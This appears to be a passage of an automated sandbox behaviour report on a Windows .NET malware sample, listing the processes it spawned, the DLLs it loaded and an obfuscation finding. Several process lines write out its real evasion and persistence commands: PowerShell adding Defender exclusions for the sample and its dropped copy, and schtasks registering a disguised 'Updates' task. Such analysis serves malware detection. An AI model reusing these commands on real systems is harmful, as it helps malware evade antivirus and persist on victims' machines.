Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pNYyTm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pNYyTm" /XML "C:\Users\user\AppData\Local\Temp\tmp496E.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pNYyTm" /XML "C:\Users\user\AppData\Local\Temp\tmp6051.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process created: C:\Users\user\AppData\Roaming\pNYyTm.exe "C:\Users\user\AppData\Roaming\pNYyTm.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Section loaded: cryptbase.dll

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ea2f20.1.raw.unpack, lNjw1JhxSV5n0cCMNW.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.55f0000.7.raw.unpack, lNjw1JhxSV5n0cCMNW.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
